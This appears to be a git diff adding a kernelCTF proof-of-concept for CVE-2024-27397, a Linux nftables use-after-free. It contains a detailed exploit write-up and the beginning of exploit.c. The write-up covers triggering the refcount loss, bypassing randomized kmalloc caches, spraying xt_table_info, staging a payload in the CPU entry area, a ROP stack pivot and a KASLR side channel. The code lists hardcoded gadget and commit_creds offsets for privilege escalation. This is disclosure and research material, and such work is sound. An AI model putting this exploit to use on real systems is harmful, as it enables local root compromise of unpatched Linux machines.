diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/docs/exploit.md
new file mode 100644
index 00000000..22181490
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/docs/exploit.md
@@ -0,0 +1,522 @@
+# CVE-2024-27397
+
+Exploit for CVE-2024-27397 against the mitigation-v3-6.1.55 instance.
+This exploit is based on my previous exploit against [CVE-2023-6817](https://github.com/google/security-research/blob/499284a767851f383681ea68e485a0620ccabce2/pocs/linux/kernelctf/CVE-2023-6817_mitigation/docs/exploit.md).
+My goal was to re-use as much as possible; therefore, the only differing bits are in the initial setup to trigger CVE-2024-27397.
+The rest of the original writeup is repeated for completeness' sake.
+
+## Abusing the vulnerability
+
+Similar to CVE-2023-6817, the bug behind CVE-2024-27397 resides in the nftables subsystem.
+(If you are unfamiliar, you may want to briefly read the
+[docs](https://wiki.nftables.org/wiki-nftables/index.php/Quick_reference-nftables_in_10_minutes))
+
+To recap, the goal of the original exploit was to create a setup like so:
+- a table `T` containing:
+  - a set `S`, which contains
+    - an `NFT_JUMP` verdict to chain `B`
+  - a base chain `A`, which contains
+    - a rule with an `NFT_JUMP` verdict to chain `B`
+  - a chain `B`, which contains
+    - a rule with an `NFT_RETURN` verdict
+    - a few junk rules
+
+The idea behind the setup is to eventually drop the `NFT_JUMP` verdict in `S` twice in order
+to lose one reference count, leading to a use-after-free on `B`.
+
+How do we create a similar setup using CVE-2024-27397?
+In order to trigger the delay in the abort path, we need many junk operations to run.
+I decided to go with the following idea (all within a single transaction, otherwise we cannot trigger the bug):
+1) add to the existing set `S` an `NFT_JUMP` verdict to chain `B` with a very short expiration time (increments the use count of `B`)
+2) immediately delete set `S` (decrements the use count of `B` because the verdict added in 1) has not expired yet)
+3) fill with junk operations, causing the element added in 1) to expire
+4) add an invalid operation, causing the whole transaction to abort
+
+When the transaction is aborted, the steps are undone in reverse order.
+We are most interested in step 2: because the verdict of 1) expired during the transaction, the
+use count decrement is _not_ undone and we have successfully lost a reference count to chain `B`:
+```c
+
+// i) transaction aborts (nf_tables_api.c):
+static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+{
+// ...
+case NFT_MSG_DELSET:
+	nft_use_inc_restore(&trans->ctx.table->use);
+	nft_clear(trans->ctx.net, nft_trans_set(trans));
+	if (nft_trans_set(trans)->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
+		nft_map_activate(&trans->ctx, nft_trans_set(trans)); // our set is re-activated
+
+	nft_trans_destroy(trans);
+	break;
+// ...
+}
+
+// ii) the set is re-activated, which performs a walk over the set
+static void nft_map_activate(const struct nft_ctx *ctx, struct nft_set *set)
+{
+	struct nft_set_iter iter = {
+		.genmask = nft_genmask_next(ctx->net),
+		.fn = nft_mapelem_activate,
+	};
+
+	set->ops->walk(ctx, set, &iter);
+// ...
+}
+
+// iii) such a walk, e.g. nft_set_rbtree.c:
+static void nft_rbtree_walk(/* ... */)
+{
+// ...
+
+	// iterate all elements
+	for (node = rb_first(&priv->root); node != NULL; node = rb_next(node)) {
+		rbe = rb_entry(node, struct nft_rbtree_elem, node);
+		// ...
+
+		// check if the element expired: uses the system time for comparison: oh-oh
+		if (nft_set_elem_expired(&rbe->ext))
+			goto cont; // whoops. element is expired, thus we miss the re-activation below
+		if (!nft_set_elem_active(&rbe->ext, iter->genmask))
+			goto cont;
+
+		elem.priv = rbe;
+
+		// activate the element again
+		iter->err = iter->fn(ctx, set, iter, &elem);
+	}
+// ...
+}
+```
+
+To prepare for the malicious transaction, we thus create the following setup:
+- table `T` containing:
+  - set `S` (initially empty, prepared for timeout elements and verdict data)
+  - chain `J` (junk, used for transaction stalls)
+  - _n_ junk sets `SJ_i` (also used for transaction stalls), each containing
+    - _m_ times: verdict `NFT_JUMP` chain `J`
+  - chain `A` (base chain)
+    - `NFT_JUMP` chain `B` (1 use initially)
+  - chain `B`
+    - `NFT_RETURN`
+    - a few junk rules
+
+In order to satisfy step 3) from above, I decided to delete the _n_ junk sets,
+each containing _m_ elements, which introduces a sufficiently large delay with
+sane parameters _n_ and _m_. The exploit uses 50 and 50000, respectively.
+
+With the specific setup out of the way, the following is taken from the original
+writeup of the exploit for CVE-2023-6817:
+
+With the chain `B` use count decremented an additional time, the chain can
+now be deleted even though chain `A` still contains an `NFT_JUMP` to it.
+
+When chain `A` is triggered, the following code is reached:
+```c
+// in net/netfilter/nf_tables_core.c
+unsigned int
+nft_do_chain(struct nft_pktinfo *pkt, void *priv)
+{
+	const struct nft_chain *chain = priv, *basechain = chain;
+	const struct nft_rule_dp *rule, *last_rule;
+	const struct nft_expr *expr, *last;
+	struct nft_regs regs = {};
+	struct nft_rule_blob *blob;
+	/* ... snip ... */
+
+do_chain:
+	if (genbit)
+		blob = rcu_dereference(chain->blob_gen_1); // [2.1]
+	else
+		blob = rcu_dereference(chain->blob_gen_0);
+
+	rule = (struct nft_rule_dp *)blob->data;
+	last_rule = (void *)blob->data + blob->size; // [2.2]
+next_rule:
+	regs.verdict.code = NFT_CONTINUE;
+	for (; rule < last_rule; rule = nft_rule_next(rule)) { // [2.3]
+		nft_rule_dp_for_each_expr(expr, last, rule) {
+			/* ... snip ... */
+			if (expr->ops != &nft_payload_fast_ops ||
+			    !nft_payload_fast_eval(expr, &regs, pkt)) // [2.4]
+				expr_call_ops_eval(expr, &regs, pkt); // [2.5]
+
+			if (regs.verdict.code != NFT_CONTINUE)
+				break;
+		}
+
+		/* ... snip ... */
+
+		break;
+	}
+
+	/* ... snip ... */
+
+	switch (regs.verdict.code) {
+	case NFT_JUMP:
+		if (WARN_ON_ONCE(stackptr >= NFT_JUMP_STACK_SIZE))
+			return NF_DROP;
+		jumpstack[stackptr].chain = chain;
+		jumpstack[stackptr].rule = nft_rule_next(rule);
+		jumpstack[stackptr].last_rule = last_rule;
+		stackptr++;
+		fallthrough;
+	case NFT_GOTO:
+		chain = regs.verdict.chain; // [2.6]
+		goto do_chain;
+	case NFT_CONTINUE:
+	case NFT_RETURN:
+		break;
+	default:
+		WARN_ON_ONCE(1);
+	}
+
+	/* ... snip ... */
+
+	return nft_base_chain(basechain)->policy;
+}
+```
+
+Since chain `A` contains a jump to chain `B`, the (now freed) chain pointer
+to `B` is used as the current chain ([2.6]) and the `do_chain` loop is repeated.
+
+While all rules in the chain and all expressions in each rule are iterated
+([2.3]), eventually the `expr->ops->eval()` function pointer is called in
+`expr_call_ops_eval()` ([2.5]).
+This leaves us with a good candidate for gaining RIP control, since we freed
+the chain object earlier and thus have full control over its contents.
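+
+For reference, the dispatch at [2.5] boils down to the following (a simplified
+sketch of `expr_call_ops_eval()` from `net/netfilter/nf_tables_core.c`; the
+retpoline fast paths for well-known expression types are elided here):
+
+```c
+static void expr_call_ops_eval(const struct nft_expr *expr,
+			       struct nft_regs *regs,
+			       struct nft_pktinfo *pkt)
+{
+	// with CONFIG_RETPOLINE, direct calls for well-known expression types
+	// are tried first; for everything else (including our fake expression)
+	// the generic indirect call below is taken
+	expr->ops->eval(expr, regs, pkt);
+}
+```
+
+With a fake `expr` whose `ops` pointer we control, this indirect call is where
+execution gets hijacked.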
+
+## Mitigation Notes
+
+We are targeting the mitigation instance, thus we have to take care of the extra
+hardening options. Specifically, we are interested in the following:
+- `CONFIG_SLAB_VIRTUAL`
+- `CONFIG_KMALLOC_SPLIT_VARSIZE`
+- `CONFIG_RANDOM_KMALLOC_CACHES`
+
+We will acknowledge `CONFIG_SLAB_VIRTUAL`, assuming it is a sane mitigation against
+cross-cache attacks.
+Therefore we have to find our way around the other two.
+
+Looking at the allocation sites for the `struct nft_chain` object, we can
+observe typical calls to `kzalloc(sizeof(*chain), GFP_KERNEL_ACCOUNT)`, leaving
+the object subject to any of the `kmalloc-128-cg-X` caches (X being one of
+the random ones).
+This is hard to deal with; therefore we are looking for a way to pivot into one
+of the `dyn-*` caches (`CONFIG_KMALLOC_SPLIT_VARSIZE`).
+Luckily, the `struct nft_chain` object contains plenty of pointers to other objects.
+Additionally, when the chain object is destroyed, none of the pointers are cleared
+(see `nf_tables_chain_destroy()` in `net/netfilter/nf_tables_api.c`).
+We therefore still have access to the freed helper objects by following the
+pointers left in the original chain object.
+We will focus on objects which are referenced during a chain walk in
+`nft_do_chain`; other objects may be suitable for double-free scenarios, but
+we will not pursue that here.
+
+Thanks to the `CONFIG_RANDOM_KMALLOC_CACHES` hardening, the noise level in
+the individual caches is extremely low.
+Therefore we can assume that none of the original pointers will be corrupted when
+we try to prepare the nested use-after-free.
+
+```c
+struct nft_chain {
+	struct nft_rule_blob __rcu *blob_gen_0;
+	struct nft_rule_blob __rcu *blob_gen_1;
+	struct list_head rules;
+	struct list_head list;
+	struct rhlist_head rhlhead;
+	struct nft_table *table;
+	u64 handle;
+	u32 use;
+	u8 flags:5,
+	   bound:1,
+	   genmask:2;
+	char *name;
+	u16 udlen;
+	u8 *udata;
+	struct nft_rule_blob *blob_next;
+};
+```
+The main pointers we are interested in are the `blob_gen_{0,1}` members.
+Each one points to the current rule "generation" depending on the
+`genmask` bits.
+These rule blobs are allocated using `nf_tables_chain_alloc_rules`:
+```c
+static struct nft_rule_blob *nf_tables_chain_alloc_rules(unsigned int size)
+{
+	struct nft_rule_blob *blob;
+
+	/* .. snip .. */
+
+	blob = kvmalloc(size, GFP_KERNEL_ACCOUNT);
+
+	/* .. snip .. */
+	return blob;
+}
+```
+Fortunately for us, blobs move into the `dyn-kmalloc-SIZE-cg-X` caches.
+
+Still, we have to defeat `CONFIG_RANDOM_KMALLOC_CACHES` in order to find a
+suitable object which can be used to reclaim the freed blob objects.
+In order to achieve that, we will abuse a minor implementation issue of the random
+kmalloc caches hardening.
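+
+For reference, the random cache selection keys on the *caller address*: every
+`kmalloc()` call site is hashed together with a boot-time seed to pick one of 16
+cache copies. A simplified sketch of the upstream selection logic (not
+necessarily the verbatim code of this kernel instance):
+
+```c
+#include <linux/hash.h>
+#include <linux/log2.h>
+
+#define RANDOM_KMALLOC_CACHES_NR 15
+
+extern unsigned long random_kmalloc_seed; /* randomized once at boot */
+
+/* A fixed call site always maps to the same one of the 16 cache copies. */
+static inline unsigned int random_kmalloc_index(unsigned long caller)
+{
+	return hash_64(caller ^ random_kmalloc_seed,
+		       ilog2(RANDOM_KMALLOC_CACHES_NR + 1));
+}
+```
+
+The hardening is thus only as good as the diversity of call sites, which is
+exactly what we attack next.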
+
+Peeking at the generated code for the `kvmalloc()` call, we will notice that
+it is inlined into a call to `kvmalloc_node()`:
+
+```objdump
+ffffffff813715f0 <kvmalloc_node>:
+ffffffff813715f0: e8 cb 5a da ff        call   ffffffff811170c0 <__fentry__>
+ffffffff813715f5: 41 54                 push   %r12
+ffffffff813715f7: 41 89 d4              mov    %edx,%r12d
+ffffffff813715fa: 55                    push   %rbp
+ffffffff813715fb: 48 89 fd              mov    %rdi,%rbp
+ffffffff813715fe: 53                    push   %rbx
+ffffffff813715ff: 89 f3                 mov    %esi,%ebx
+ffffffff81371601: 48 81 ff 00 10 00 00  cmp    $0x1000,%rdi
+ffffffff81371608: 77 09                 ja     ffffffff81371613
+ffffffff8137160a: 5b                    pop    %rbx
+ffffffff8137160b: 5d                    pop    %rbp
+ffffffff8137160c: 41 5c                 pop    %r12
+ffffffff8137160e: e9 dd cc 00 00        jmp    ffffffff8137e2f0 <__kmalloc_node> [3.1]
+ffffffff81371613: 89 f0                 mov    %esi,%eax
+ffffffff81371615: 81 ce 00 20 01 00     or     $0x12000,%esi
+ffffffff8137161b: 80 cc 20              or     $0x20,%ah
+ffffffff8137161e: f6 c7 40              test   $0x40,%bh
+ffffffff81371621: 0f 45 f0              cmovne %eax,%esi
+ffffffff81371624: 81 e6 ff 7f ff ff     and    $0xffff7fff,%esi
+ffffffff8137162a: e8 c1 cc 00 00        call   ffffffff8137e2f0 <__kmalloc_node> [3.2]
+...
+```
+
+As you can see in the snippet above, the call to `__kmalloc_node` is a proper
+tail call when the size does not exceed `PAGE_SIZE` ([3.1]).
+Otherwise the call is explicit ([3.2]).
+
+This is problematic because `__kmalloc_node` will use the return address
+to derive the *random* cache to use.
+Since all calls to `kvmalloc_node` share the same caller address when the size
+is large, the hardening is rendered completely pointless for them.
+Therefore our goal will be to increase the allocation size such that we hit the
+`dyn-kmalloc-8192-cg` cache.
+
+## Heap Spray
+
+To recap, our setup consists of a chain `A` with a jump to a freed "chain" `B`.
+We want to target the `blob_gen_{0,1}` members of type `struct nft_rule_blob` of
+this freed object.
+
+A `struct nft_rule_blob` is basically a flat binary blob of `struct nft_rule_dp`s,
+which in turn are flat binary blobs of `struct nft_expr`s:
+```c
+struct nft_expr {
+	const struct nft_expr_ops *ops;
+	unsigned char data[]
+		__attribute__((aligned(__alignof__(u64))));
+};
+
+struct nft_rule_dp {
+	u64 is_last:1,
+	    dlen:12,
+	    handle:42; /* for tracing */
+	unsigned char data[]
+		__attribute__((aligned(__alignof__(struct nft_expr))));
+};
+
+struct nft_rule_blob {
+	unsigned long size;
+	unsigned char data[]
+		__attribute__((aligned(__alignof__(struct nft_rule_dp))));
+};
+```
+
+In order to increase the size of the blobs, we can simply add many rules, each
+containing a few expressions.
+
+Now we only need an object which can be used to spray a controlled payload
+using the same allocation primitive.
+The most convenient object is `struct xt_table_info`:
+```c
+struct xt_table_info {
+	unsigned int size; // [4.1]
+	unsigned int number;
+	unsigned int initial_entries;
+	unsigned int hook_entry[NF_INET_NUMHOOKS];
+	unsigned int underflow[NF_INET_NUMHOOKS];
+	unsigned int stacksize;
+	void ***jumpstack;
+
+	unsigned char entries[] __aligned(8);
+};
+
+// in net/netfilter/x_tables.c
+struct xt_table_info *xt_alloc_table_info(unsigned int size)
+{
+	struct xt_table_info *info = NULL;
+	size_t sz = sizeof(*info) + size;
+
+	if (sz < sizeof(*info) || sz >= XT_MAX_TABLE_SIZE)
+		return NULL;
+
+	info = kvmalloc(sz, GFP_KERNEL_ACCOUNT);
+	if (!info)
+		return NULL;
+
+	memset(info, 0, sizeof(*info));
+	info->size = size; // [4.2]
+	return info;
+}
+
+static int
+do_replace(struct net *net, sockptr_t arg, unsigned int len)
+{
+	int ret;
+	struct ipt_replace tmp;
+	struct xt_table_info *newinfo;
+	void *loc_cpu_entry;
+	struct ipt_entry *iter;
+
+	if (copy_from_sockptr(&tmp, arg, sizeof(tmp)) != 0)
+		return -EFAULT;
+
+	/* .. snip .. */
+
+	newinfo = xt_alloc_table_info(tmp.size); // [4.3]
+	if (!newinfo)
+		return -ENOMEM;
+
+	loc_cpu_entry = newinfo->entries;
+	if (copy_from_sockptr_offset(loc_cpu_entry, arg, sizeof(tmp), // [4.4]
+			tmp.size) != 0) {
+		ret = -EFAULT;
+		goto free_newinfo;
+	}
+
+	/* .. snip .. */
+
+ free_newinfo:
+	xt_free_table_info(newinfo);
+	return ret;
+}
+```
+
+Revisiting the code which is triggered during an nftables chain evaluation, we
+need a sanely initialized `blob->size` member ([2.2]), otherwise the
+individual rules in the blob would not be iterated.
+This rules out objects which have pointers or zeroes as their first member, but
+the `struct xt_table_info.size` member fits perfectly ([4.1]).
+
+As seen at the `struct xt_table_info` allocation site, the structure header is
+cleared to zero on allocation and the size is set to the user-provided value ([4.2]).
+Eventually the full user-provided payload is copied into the allocated buffer
+prior to any sanitization ([4.4]).
+In order to skip the sanitization step, we can simply force a fault during the
+user copy.
+Though this immediately frees our payload again, the content we care about has
+been written, and free list randomization will ensure that we can exhaust the
+full cache with our fake objects.
+
+Note that there is a hole of roughly `60` bytes between the `size` member and
+our payload.
+These bytes are all zero, which fits the iteration in `nft_do_chain` perfectly.
+Inspecting the macro expansion of the expression iteration (see [2.3]), we can see
+that the loop exits before the first iteration because `rule->dlen` is zero:
+```c
+for ((expr) = (struct nft_expr *)&rule->data[0],
+     (last) = (struct nft_expr *)&rule->data[rule->dlen];
+     (expr) != (last); (expr) = ((void *)expr) + expr->ops->size)
+{ /* .. */ }
+```
+
+Since the verdict is initialized to `NFT_CONTINUE`, we continue iterating
+rules until our actual payload is hit.
+
+## Payload Considerations
+
+When our payload is triggered in `expr_call_ops_eval()`, the following arguments
+are provided (in RDI, RSI, RDX respectively):
+```c
+	expr->ops->eval(expr, regs, pkt);
+```
+
+In order to resolve the pointer indirection required for dereferencing
+`expr->ops->eval`, we will utilize the deterministically known location of the
+exception stacks in the CPU entry area. The missing CPU entry area randomization
+(CVE-2023-0597) is not fixed in the targeted LTS release and is thus usable for
+us. This technique is well known and has been documented several times.
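+
+Concretely, the constants below (taken from this exploit's `exploit.c` and
+specific to this target's memory layout) describe where a helper task's
+spilled registers end up:
+
+```c
+// Base of the CPU entry area for a given CPU; not randomized on this LTS
+// kernel (CVE-2023-0597 unfixed).
+#define CPU_ENTRY_AREA_BASE(cpu) (0xfffffe0000001000ull + (u64)cpu * 0x3b000)
+// Location inside the exception stacks where the register contents of a
+// faulting helper task can be found.
+#define PAYLOAD_LOCATION(cpu) (CPU_ENTRY_AREA_BASE(cpu) + 0x1f58)
+```
+
+A helper task pinned to a known CPU loads chosen values into its registers and
+then takes an exception; the values are spilled to the exception stack at
+`PAYLOAD_LOCATION()`, giving us kernel memory with known content at a known
+address which the fake `expr->ops` pointer can reference.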
+
+We have full control over `expr` (the payload we sprayed), limited control
+over `regs` (the registers used by the nftables evaluation machine, which can be
+read / written through expressions), and limited control over `pkt`, which
+contains data from the packet that we send to trigger the evaluation.
+
+At the point of evaluation we are in an interrupt context, thus we have to be
+more careful in order to maximize reliability.
+I chose to restore execution directly at the end of the `nft_do_chain` function
+call.
+
+Since there are better jump gadgets using `rsi`, we will set up a simple stack
+pivot to `rdi` while using gadget pointers in the `regs` buffer.
+In order to control the `regs` buffer, we will utilize the fast paths for
+expression evaluation, specifically the `nft_payload_fast_eval` call ([2.4]).
+Through the creation of fake `struct nft_payload` expressions we can copy
+data from the packet into the `regs` registers.
+
+With a stack pivot set up into the fully controllable `expr` buffer, a
+privilege escalation payload can be assembled trivially.
+
+Finally, we only need to restore the stack to the previous state and eventually
+jump into the `nft_do_chain` function trailer:
+```objdump
+ffffffff81e51380 <nft_do_chain>:
+ffffffff81e51380: e8 3b 5d 2c ff        call   ffffffff811170c0 <__fentry__>
+ffffffff81e51385: 41 57                 push   %r15
+...
+ffffffff81e5139a: 48 81 ec 20 02 00 00  sub    $0x220,%rsp
+ffffffff81e513a1: 65 48 8b 04 25 28 00  mov    %gs:0x28,%rax
+ffffffff81e513aa: 48 89 84 24 18 02 00  mov    %rax,0x218(%rsp)
+ffffffff81e513b2: 48 8b 47 08           mov    0x8(%rdi),%rax
+ffffffff81e513b6: 4c 8d 64 24 48        lea    0x48(%rsp),%r12 [5.1]
+
+...
+
+ffffffff81e517e4: 48 81 c4 20 02 00 00  add    $0x220,%rsp
+ffffffff81e517eb: 89 d0                 mov    %edx,%eax [5.2]
+ffffffff81e517ed: 5b                    pop    %rbx
+ffffffff81e517ee: 5d                    pop    %rbp
+ffffffff81e517ef: 41 5c                 pop    %r12
+ffffffff81e517f1: 41 5d                 pop    %r13
+ffffffff81e517f3: 41 5e                 pop    %r14
+ffffffff81e517f5: 41 5f                 pop    %r15
+ffffffff81e517f7: e9 84 34 5b 00        jmp    ffffffff82404c80 <__x86_return_thunk>
+```
+
+Looking at the beginning of the function, we can see that a pointer into the
+original stack frame is preserved in `r12` ([5.1]).
+By selecting gadgets which do not clobber `r12`, we can use it to restore the
+stack pointer.
+Since we control a lot of space in the CPU entry area, we can easily set up
+a few jump gadgets which pivot the stack back from `expr` to the pointer in `r12`.
+Eventually we will jump to the function trailer ([5.2]) and set the
+return value to `NF_DROP` to make sure that we are not being called again.
+
+## KASLR Bypass
+
+We will use a `prefetch` timing side channel to bypass KASLR reliably.
+The code for that is adapted from [here](https://github.com/IAIK/prefetch/blob/master/cacheutils.h).
+We use a 7-trial majority vote for our final result.
+
+Since this does not work on the AMD EPYC CPU used by the CI reproduction runner,
+we use a slightly different approach when running the reproduction (use
+`make real_exploit` for the real exploit which captured the flag).
+
+It can be observed that the prefetch timings on the AMD CPU are significantly
+larger when the memory is mapped by the kernel (contrary to the Intel CPU, where
+the timings are significantly lower for such memory).
+We therefore "invert" our timing logic and look for a region of contiguously mapped
+memory that looks like the kernel text region.
+When such a region is found, we assume its start is the KASLR base.
+
+## Reliability
+
+The exploit should be close to 100% reliable as long as the KASLR leak is correct.
+KASLR success rates varied from 90% to 100% during local testing.
diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/docs/vulnerability.md
new file mode 100644
index 00000000..277f9116
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/docs/vulnerability.md
@@ -0,0 +1,16 @@
+- Requirements:
+  - Capabilities: CAP_NET_ADMIN
+  - Kernel configuration: CONFIG_NF_TABLES=y
+  - User namespaces required: Yes
+- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=c3e1b005ed1c
+- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7395dfacfff65e9938ac0889dafa1ab01e987d15
+- Affected Version: v4.1 - v6.8
+- Affected Component: netfilter, nftables
+- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27397
+- Cause: Use-After-Free
+
+A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.
+NFT sets and their elements can have associated timeouts.
+These timeouts are checked against the live system clock to assess expiration (see `nft_set_elem_expired` in `nf_tables.h`).
+This causes issues when elements expire during a transaction: a potential transaction
+rollback then performs an asymmetric clean-up, missing, for example, required reference count updates.
diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/Makefile b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/Makefile
new file mode 100644
index 00000000..63690f18
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/Makefile
@@ -0,0 +1,6 @@
+
+exploit: exploit.c netlink.c
+	$(CC) -O3 -ggdb -static -Wall -o $@ $^ -lpthread
+
+real_exploit: exploit.c netlink.c
+	$(CC) -O3 -ggdb -static -Wall -DKASLR_BYPASS_INTEL=1 -o exploit $^ -lpthread
diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/exploit b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/exploit
new file mode 100755
index 00000000..eb0e9904
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/exploit differ
diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/exploit.c b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/exploit.c
new file mode 100644
index 00000000..de83b970
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/exploit.c
@@ -0,0 +1,1612 @@
+#define _GNU_SOURCE
+#include <errno.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdarg.h>
+#include <stddef.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#include <arpa/inet.h>
+#include <endian.h>
+#include <fcntl.h>
+#include <net/if.h>
+#include <netinet/in.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/times.h>
+#include <linux/netlink.h>
+#include <linux/rtnetlink.h>
+#include <linux/netfilter.h>
+#include <linux/netfilter/nfnetlink.h>
+#include <linux/netfilter/nf_tables.h>
+#include <linux/netfilter_ipv4/ip_tables.h>
+
+typedef unsigned char u8;
+typedef unsigned short u16;
+typedef unsigned int u32;
+typedef unsigned long long u64;
+typedef char i8;
+typedef short i16;
+typedef int i32;
+typedef long long i64;
+
+#include "netlink.h"
+
+#define FAIL_IF(x) if ((x)) { \
+    perror(#x); \
+    return -1; \
+}
+#define PANIC_IF(x) if ((x)) { \
+    perror(#x); \
+    exit(errno); \
+}
+#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))
+
+inline static int _pin_to_cpu(int id) {
+    cpu_set_t set;
+    CPU_ZERO(&set);
+    CPU_SET(id, &set);
+    return sched_setaffinity(getpid(), sizeof(set), &set);
+}
+
+#define MY_TABLE "T", strlen("T")
+#define MY_SET "S", strlen("S")
+#define CHAIN_A "chainA", strlen("chainA")
+#define CHAIN_B "chainB", strlen("chainB")
+#define CHAIN_JUNK "J", strlen("J")
+
+#define MAX_NUM_JUNK_OPS 50
+#define NUM_ELEMS_JUNK_SET 50000
+#define NUM_ELEMS_PER_BATCH 90
+static u16 generate_set_name(u16 index) {
+    u8 low = index / 24;
+    u8 high = index % 24;
+
+    return (u16)('0' + low) | ((u16)('a' + high) << 8);
+}
+
+#define MY_KEY_LEN 4
+#define MY_KEY "AAAA", MY_KEY_LEN
+
+//
+// offsets
+//
+
+// ffffffff81e09097: push rdi; jmp qword ptr [rsi+0xf]; 4c57ff660f
+u64 push_rdi_jmp_rsi_0xf = 0xffffffff81e09097;
+
+// ffffffff8126df29: pop rsp; add rsp, 0x20; pop rbx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 5c4883c4205be94c6d1901c3
+u64 pop_rsp_add_rsp_0x20_pop_rbx = 0xffffffff8126df29;
+
+// ffffffff81251258: pop rdx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 5ae9223a1b01c3
+u64 pop_rdx = 0xffffffff81251258;
+// ffffffff818180b4: pop rbp; jmp __x86_return_thunk (0xffffffff82404c80); ret; 5de9c6cbbe00c3
+u64 pop_rbp = 0xffffffff818180b4;
+
+// ffffffff8102871c: pop rcx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 59e95ec53d01c3
+u64 pop_rcx = 0xffffffff8102871c;
+// ffffffff818344a5: push rax; jmp qword ptr [rcx]; 50ff21
+u64 push_rax_jmp_rcx = 0xffffffff818344a5;
+// ffffffff81dadf48: pop rsp; jmp qword ptr [rsi+0xf]; 5cff660f
+u64 pop_rsp_jmp_rsi_0xf = 0xffffffff81dadf48;
+
+// ffffffff81bc9099: lea rax, [r12+rbp]; pop rbx; pop rbp; pop r12; pop r13; pop r14; jmp __x86_return_thunk (0xffffffff82404c80); ret; 498d042c5b5d415c415d415ee9d6bb8300c3
+u64 lea_rax_r12_plus_rbp_pop5 = 0xffffffff81bc9099;
+
+// ffffffff812f9168: pop rdi; jmp __x86_return_thunk (0xffffffff82404c80); ret; 5fe912bb1001c3
+u64 pop_rdi = 0xffffffff812f9168;
+
+// ffffffff8124f56d: 48 89 c7             mov %rax,%rdi
+// ffffffff8124f570: 48 89 3d d1 b9 23 03 mov %rdi,0x323b9d1(%rip) # ffffffff8448af48
+// ffffffff8124f577: e9 04 57 1b 01       jmp ffffffff82404c80 <__x86_return_thunk>
+u64 mov_rdi_rax = 0xffffffff8124f56d;
+
+// ffffffff81bd1748: pop rsi; jmp __x86_return_thunk (0xffffffff82404c80); ret; 5ee932358300c3
+u64 pop_rsi = 0xffffffff81bd1748;
+
+// function trailer for nft_do_chain
+u64 nft_do_chain_leave = 0xffffffff81e517eb;
+
+// we use this for the fast path to copy some data from the skb into RSI
+u64 nft_payload_fast_ops = 0xffffffff82b27580;
+
+u64 find_task_by_vpid = 0xffffffff811bbe60;
+u64 switch_task_namespaces = 0xffffffff811c3a30;
+u64 commit_creds = 0xffffffff811c55a0;
+u64 prepare_kernel_cred = 0xffffffff811c5840;
+u64 init_task = 0xffffffff83815a40;
+u64 init_nsproxy = 0xffffffff83876720;
+
+// ffffffff810ebbdd: add rsp, 0x88; jmp __x86_return_thunk (0xffffffff82404c80); ret; 4881c488000000e997903101c3
+u64 add_rsp_0x88 = 0xffffffff810ebbdd;
+
+
+#define FOR_ALL_OFFSETS(x) do { \
+    x(push_rdi_jmp_rsi_0xf); \
+    x(pop_rsp_add_rsp_0x20_pop_rbx); \
+    x(pop_rdx); \
+    x(pop_rbp); \
+    x(pop_rcx); \
+    x(push_rax_jmp_rcx); \
+    x(pop_rsp_jmp_rsi_0xf); \
+    x(lea_rax_r12_plus_rbp_pop5); \
+    x(pop_rdi); \
+    x(mov_rdi_rax); \
+    x(pop_rsi); \
+    x(add_rsp_0x88); \
+    x(nft_do_chain_leave); \
+    x(nft_payload_fast_ops); \
+    x(find_task_by_vpid); \
+    x(switch_task_namespaces); \
+    x(commit_creds); \
+    x(prepare_kernel_cred); \
+    x(init_task); \
+    x(init_nsproxy); \
+} while(0)
+
+//
+//
+//
+
+// just use side channels
+int bypass_kaslr(u64 base);
+
+// CPU entry area pointers. We prepare some memory here that will be referenced
+// by the ROP chains.
+// We need:
+// - the struct nft_expr_ops { .eval } member
+// - a pivot gadget to restore the stack
+// - and a pointer to the nft_do_chain function trailer so that we jump to it.
+#define CPU_ENTRY_AREA_BASE(cpu) (0xfffffe0000001000ull + (u64)cpu * 0x3b000)
+#define PAYLOAD_LOCATION(cpu) (CPU_ENTRY_AREA_BASE(cpu) + 0x1f58)
+#define MAIN_CPU 0
+#define HELPER_CPU 1
+
+struct cpu_entry_area_payload {
+    union {
+        struct {
+            // function to call to evaluate the expression
+            u64 nft_expr_eval;
+            // stack pivot gadget to go back to normal execution
+            u64 pop_rsp_jmp_rsi_0xf;
+            // nft_do_chain jump target to restore execution
+            u64 nft_do_chain_leave;
+        };
+        u64 regs[16];
+    };
+};
+
+
+// Our payload which will reclaim the object in chain->{blob_gen_1,blob_gen_0}.
+// This is essentially a struct nft_rule_blob with a single rule.
